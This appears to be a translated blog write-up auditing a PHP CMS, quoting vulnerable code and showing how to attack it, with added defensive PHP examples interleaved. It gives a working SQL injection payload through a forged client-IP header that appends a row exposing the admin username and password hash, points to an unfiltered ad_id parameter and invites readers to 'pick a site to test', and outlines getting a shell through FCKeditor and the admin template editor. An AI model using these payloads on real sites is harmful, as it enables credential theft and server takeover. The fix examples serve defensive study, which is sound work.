Collect your MJJ
0x01. Injection
Injection via a forged client IP
Look at the code:
Here the getip function obtains the client's IP address. Both HTTP_CLIENT_IP and HTTP_X_FORWARDED_FOR come from request headers, so either can be forged by the client.
Line 106 of include/common.fun.php:
function getip()
{
    // every branch except the last reads a request header that the client controls
    if (getenv('HTTP_CLIENT_IP'))
    {
        $ip = getenv('HTTP_CLIENT_IP');
    }
    elseif (getenv('HTTP_X_FORWARDED_FOR'))
    { // obtain the real client IP when the request came through a proxy server
        $ip = getenv('HTTP_X_FORWARDED_FOR');
    }
    elseif (getenv('HTTP_X_FORWARDED'))
    {
        $ip = getenv('HTTP_X_FORWARDED');
    }
    elseif (getenv('HTTP_FORWARDED_FOR'))
    {
        $ip = getenv('HTTP_FORWARDED_FOR');
    }
    elseif (getenv('HTTP_FORWARDED'))
    {
        $ip = getenv('HTTP_FORWARDED');
    }
    else
    {
        // only this value comes from the TCP connection rather than a header
        $ip = $_SERVER['REMOTE_ADDR'];
    }
    return $ip;
}
Now follow where getip() is used.
Line 113 of comment.php:
// the return value of getip() is concatenated straight into the INSERT, unescaped
$sql = "INSERT INTO " . table('comment') . " (com_id, post_id, user_id, type, mood, content, pub_date, ip, is_check)
        VALUES ('', '$id', '$user_id', '$type', '$mood', '$content', '$timestamp', '" . getip() . "', '$is_check')";
$db->query($sql);
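As an added example (not the CMS's own code), here is how the two pieces above can be written so that a forged header cannot reach the database as a string payload: a replacement for getip() that only honours X-Forwarded-For when the TCP peer is a configured proxy and validates every candidate with filter_var(), and the comment INSERT rewritten as a PDO prepared statement. The trusted-proxy address and the table() prefix helper are placeholders assumed for the example; $db is assumed to be a PDO connection.

```php
<?php
// Added example, not the CMS's own code.
// Assumptions: PDO is available; $trustedProxies holds the address(es) of the
// reverse proxy that is allowed to set forwarding headers (placeholder value);
// table() stands in for the CMS helper that adds the table prefix.

$trustedProxies = ['10.0.0.5']; // placeholder: your reverse proxy's address

// Placeholder for the CMS's own table() helper.
function table(string $name): string
{
    return 'prefix_' . $name;
}

// Return the client IP. Forwarding headers are only used when REMOTE_ADDR is a
// known proxy, and each candidate must validate as an IP literal, so the value
// that reaches the application is never free-form attacker text.
function getip_safe(array $trustedProxies): string
{
    $remote = $_SERVER['REMOTE_ADDR'] ?? '0.0.0.0';
    if (!in_array($remote, $trustedProxies, true)) {
        return $remote; // direct connection: any forwarding header is untrusted
    }
    $header = $_SERVER['HTTP_X_FORWARDED_FOR'] ?? '';
    // X-Forwarded-For is "client, proxy1, proxy2": each proxy appends the peer it
    // saw, so walk from the right and skip our own proxies to find the client.
    $hops = array_map('trim', explode(',', $header));
    for ($i = count($hops) - 1; $i >= 0; $i--) {
        $candidate = $hops[$i];
        if (in_array($candidate, $trustedProxies, true)) {
            continue;
        }
        if (filter_var($candidate, FILTER_VALIDATE_IP) !== false) {
            return $candidate;
        }
        break; // malformed entry: stop trusting the rest of the chain
    }
    return $remote;
}

// The comment INSERT with bound parameters. Values are never concatenated into
// the SQL text, so neither the IP nor $content can change the shape of the
// statement, and appending extra "VALUES (...)" tuples is no longer possible.
function insert_comment(PDO $db, array $row, string $ip): bool
{
    $sql = 'INSERT INTO ' . table('comment')
         . ' (com_id, post_id, user_id, type, mood, content, pub_date, ip, is_check)'
         . ' VALUES (NULL, :post_id, :user_id, :type, :mood, :content, :pub_date, :ip, :is_check)';
    $stmt = $db->prepare($sql);
    return $stmt->execute([
        ':post_id'  => (int) $row['id'],
        ':user_id'  => (int) $row['user_id'],
        ':type'     => $row['type'],
        ':mood'     => $row['mood'],
        ':content'  => $row['content'],
        ':pub_date' => (int) $row['timestamp'],
        ':ip'       => $ip,
        ':is_check' => (int) $row['is_check'],
    ]);
}

// Usage in comment.php (placeholders for the page's variables):
// insert_comment($db, compact('id', 'user_id', 'type', 'mood', 'content', 'timestamp', 'is_check'),
//                getip_safe($trustedProxies));
```

The IP validation on its own would already stop this particular payload, but the prepared statement is the fix for the root cause: every other column in that INSERT is interpolated the same way, and a header is just one of many inputs that end up there.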
Now test with a forged IP address.
View the result:
Can you see it?
It has been injected.
The problem here is the error handling: the application prints its own error message, so we cannot use a database error message to expose the username and password directly. We could use blind injection to extract the username and password, but that is too troublesome. I kept thinking and thinking about what method to use...
After all, there is more than one way to think about it. Because this is an INSERT statement, we can insert the information we want and have it displayed on the front-end page.
We can construct the statement like this:
a', 'xxx'), ('', '1', '1', '1', '1', '2', (select concat(admin_name, 0x3a, pwd) from blue_admin limit 1645457407), '123', 'ss', '1')#
This closes the preceding INSERT statement. Because an INSERT accepts several row tuples at once, i.e. insert into table (a, b, c) values ('fuck1', 'fuck2', 'fuck3'), ('fuck4', 'fuck5', 'fuck6')..., a few more rows can be inserted this way, and so we can insert a row of our own choosing.
Let's test:
Have you seen it? We have obtained the username and password.
That is the first one.
0x02 Continuing with injection
Line 19 of ad.js.php:
$ad_id = !empty($_GET['ad_id']) ? trim($_GET['ad_id']) : '';
if (empty($ad_id))
{
    echo 'error!';
    exit();
}
// $ad_id is only trimmed, never validated or quoted, before being concatenated
$ad = $db->getone("SELECT * FROM " . table('ad') . " WHERE ad_id=" . $ad_id);
$ad_id is passed in without any filtering and goes straight into the query, so injection happens right here.
So this is a bare injection.
So here you can pick a site to test.
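As an added example (not the CMS's own code), the ad lookup can be hardened by treating ad_id as what it is, an integer key: reject anything that is not a string of digits before it goes near the query, and bind it with PDO::PARAM_INT. The table() prefix helper is a placeholder assumed for the example, and $db is assumed to be a PDO connection.

```php
<?php
// Added example, not the CMS's own code: a hardened version of the ad_id
// lookup from ad.js.php. Assumes PDO; table() is a placeholder for the CMS helper.

// Placeholder for the CMS's own table() helper, which adds the table prefix.
function table(string $name): string
{
    return 'prefix_' . $name;
}

// Return the ad id as an int, or null when the parameter is missing or is not a
// positive integer. Rejects arrays (ad_id[]=1), empty strings, "0", and anything
// containing non-digits such as "1 or 1=1" or "1 union select ...".
function parse_ad_id($raw): ?int
{
    if (!is_string($raw)) {
        return null;
    }
    $raw = trim($raw);
    if ($raw === '' || !ctype_digit($raw) || strlen($raw) > 10) {
        return null;
    }
    $id = (int) $raw;
    return $id > 0 ? $id : null;
}

// Fetch one ad row by id, or null when the id is invalid or no row exists.
// The id is bound as an integer parameter, never concatenated into the SQL.
function load_ad(PDO $db, $raw_ad_id): ?array
{
    $ad_id = parse_ad_id($raw_ad_id);
    if ($ad_id === null) {
        return null; // caller prints 'error!' and exits, as the original page does
    }
    $stmt = $db->prepare('SELECT * FROM ' . table('ad') . ' WHERE ad_id = :ad_id');
    $stmt->bindValue(':ad_id', $ad_id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Usage in ad.js.php:
// $ad = load_ad($db, $_GET['ad_id'] ?? null);
// if ($ad === null) { echo 'error!'; exit(); }
```

Validating with ctype_digit() rather than intval() matters: intval("1 or 1=1") silently returns 1, which hides the tampering instead of rejecting the request, and a rejected request is also the event worth logging.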
0x03 getshell
Let's move on: getting a shell directly.
FCK, version 2.6.3
Getshell.
0x04 Getting a shell from the admin backend
Go to System Settings, then Template Management, and click Edit.
The template is edited here.
Click Edit.
Go up to the parent directory.
There may be many more problems.
Regardless of the security issues with a set of programs, I still don't despise these programmers, because a real CMS requires me to develop it; I can only say that I..., in the past, also looked at some programs that had a lot of security problems with a BS mentality. Finally, when I went into development one day, I understood it. In fact, today I look at the SB program I wrote back then with the same SB mentality. So the last sentence is: respect the fruits of others' work.
From: http://hi.baidu.com/sethc5/blog Xidu